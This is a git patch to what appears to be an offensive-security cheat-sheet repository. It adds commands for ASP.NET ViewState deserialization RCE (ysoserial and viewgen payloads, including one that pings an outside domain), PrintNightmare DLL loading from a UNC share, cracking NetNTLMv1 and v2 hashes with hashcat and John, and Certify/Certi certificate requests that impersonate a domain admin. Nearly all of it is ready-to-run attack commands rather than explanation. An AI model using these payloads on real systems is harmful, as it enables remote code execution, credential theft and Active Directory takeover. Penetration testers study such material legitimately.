From d2f63406cd5388355af45adbd5aa47e5acd8bc67 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Thu, 16 Sep 2021 17:45:29 +0200 Subject: [PATCH] IIS + Certi + NetNTLMv1 --- API Key Leaks/README.md | 30 ++++++++++++++++--- .../Active Directory Attack.md | 22 ++++++++++++-- 2 files changed, 46 insertions(+), 6 deletions(-) diff --git a/API Key Leaks/README.md b/API Key Leaks/README.md index b4dd55b..1c029f4 100644 --- a/API Key Leaks/README.md +++ b/API Key Leaks/README.md @@ -125,21 +125,43 @@ Common locations of **web.config** / **machine.config** * HKEY_CURRENT_USER\Software\Microsoft\ASP.NET\4.0.30319.0\AutoGenKeyV4 * HKEY_CURRENT_USER\Software\Microsoft\ASP.NET\2.0.50727.0\AutoGenKey -Exploit with [Blacklist3r](https://github.com/NotSoSecure/Blacklist3r) #### Identify known machine key +* Exploit with [Blacklist3r/AspDotNetWrapper](https://github.com/NotSoSecure/Blacklist3r) +* Exploit with [ViewGen](https://github.com/0xacb/viewgen) + ```powershell -AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata --purpose=viewstate --modifier= –macdecode +# --webconfig WEBCONFIG: automatically load keys and algorithms from a web.config file +# -m MODIFIER, --modifier MODIFIER: VIEWSTATEGENERATOR value +$ viewgen --guess "/wEPDwUKMTYyODkyNTEzMw9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRkuVmqYhhtcnJl6Nfet5ERqNHMADI=" +[+] ViewState is not encrypted +[+] Signature algorithm: SHA1 + +# --encrypteddata : __VIEWSTATE parameter value of the target application +# --modifier : __VIEWSTATEGENERATOR parameter value +$ AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata --purpose=viewstate --modifier= –macdecode +``` + +#### Decode ViewState + +```powershell +$ viewgen --decode --check --webconfig web.config --modifier CA0B0334 "zUylqfbpWnWHwPqet3cH5Prypl94LtUPcoC7ujm9JJdLm8V7Ng4tlnGPEWUXly+CDxBWmtOit2HY314LI8ypNOJuaLdRfxUK7mGsgLDvZsMg/MXN31lcDsiAnPTYUYYcdEH27rT6taXzDWupmQjAjraDueY=" + +$ AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata /wEPDwUKLTkyMTY0MDUxMg9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRkbdrqZ4p5EfFa9GPqKfSQRGANwLs= --decrypt --purpose=viewstate --modifier=CA0B0334 --macdecode ``` #### Generate ViewState for RCE -**NOTE**: In Burp you should **URL Encode Key Characters** for your payload. +**NOTE**: Send a POST request with the generated ViewState to the same endpoint, in Burp you should **URL Encode Key Characters** for your payload. ```powershell -ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "cmd.exe /c nslookup " --decryptionalg="AES" --generator=ABABABAB decryptionkey="" --validationalg="SHA1" --validationkey="" +$ ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "cmd.exe /c nslookup " --decryptionalg="AES" --generator=ABABABAB decryptionkey="" --validationalg="SHA1" --validationkey="" +$ ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "echo 123 > c:\pwn.txt" --generator="CA0B0334" --validationalg="MD5" --validationkey="b07b0f97365416288cf0247cffdf135d25f6be87" +$ ysoserial.exe -p ViewState -g ActivitySurrogateSelectorFromFile -c "C:\Users\zhu\Desktop\ExploitClass.cs;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.dll;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Web.dll" --generator="CA0B0334" --validationalg="SHA1" --validationkey="b07b0f97365416288cf0247cffdf135d25f6be87" + +$ viewgen --webconfig web.config -m CA0B0334 -c "ping yourdomain.tld" ``` diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 5f17845..d6d6a4a 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -651,6 +651,10 @@ Requirements: ## RCE misc::printnightmare /server:CASTLE /library:\\10.0.2.12\smb\beacon.dll /authdomain:LAB /authuser:Username /authpassword:Password01 /try:50 ``` +* [PrintNightmare - @outflanknl](https://github.com/outflanknl/PrintNightmare) + ```powershell + PrintNightmare [target ip or hostname] [UNC path to payload Dll] [optional domain] [optional username] [optional password] + ``` **Debug informations** @@ -1694,11 +1698,16 @@ klist PetitPotam.exe Responder-IP DC-IP # Patched around August 2021 PetitPotam.py -u Username -p Password -d Domain -dc-ip DC-IP Responder-IP DC-IP # Not patched for authenticated users ``` -* If you got some `NTLMv1 hashes`, you need to format then submit them on [crack.sh](https://crack.sh/netntlm/), or crack them with Hashcat/John +* If you got some `NTLMv1 hashes`, you need to format them to submit them on [crack.sh](https://crack.sh/netntlm/) ```ps1 username::hostname:response:response:challenge -> NTHASH:response NTHASH:F35A3FE17DCB31F9BE8A8004B3F310C150AFA36195554972 ``` +* Or crack them with Hashcat / John The Ripper + ```ps1 + john --format=netntlm hash.txt + hashcat -m 5500 -a 3 hash.txt + ``` * Now you can DCSync using the Pass-The-Hash with the DC machine account :warning: NTLMv1 with SSP(Security Support Provider) changes the server challenge and is not quite ideal for the attack, but it can be used. @@ -1723,6 +1732,13 @@ PS > .\inveighzero.exe -FileOutput Y -NBNS Y -mDNS Y -Proxy Y -MachineAccounts Y PS > Invoke-Inveigh [-IP '10.10.10.10'] -ConsoleOutput Y -FileOutput Y -NBNS Y –mDNS Y –Proxy Y -MachineAccounts Y ``` +Crack the hashes with Hashcat / John The Ripper + +```ps1 +john --format=netntlmv2 hash.txt +hashcat -m 5600 -a 3 hash.txt +``` + ### Man-in-the-Middle attacks & relaying @@ -1925,9 +1941,11 @@ Exploitation: or PS> Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=1.3.6.1.4.1.311.20.2.2)(pkiextendedkeyusage=1.3.6.1.5.5.7.3.2) (pkiextendedkeyusage=1.3.6.1.5.2.3.4))(mspki-certificate-name-flag:1.2.840.113556.1.4.804:=1))' -SearchBase 'CN=Configuration,DC=lab,DC=local' ``` -* Use Certify to request a Certificate and add an alternative name (user to impersonate) +* Use Certify or [Certi](https://github.com/eloypgz/certi) to request a Certificate and add an alternative name (user to impersonate) ```ps1 + # request certificates for the machine account by executing Certify with the "/machine" argument from an elevated command prompt. Certify.exe request /ca:dc.domain.local\domain-DC-CA /template:VulnTemplate /altname:domadmin + certi.py req 'contoso.local/Anakin@dc01.contoso.local' contoso-DC01-CA -k -n --alt-name han --template UserSAN ``` * Use OpenSSL and convert the certificate, do not enter a password ```ps1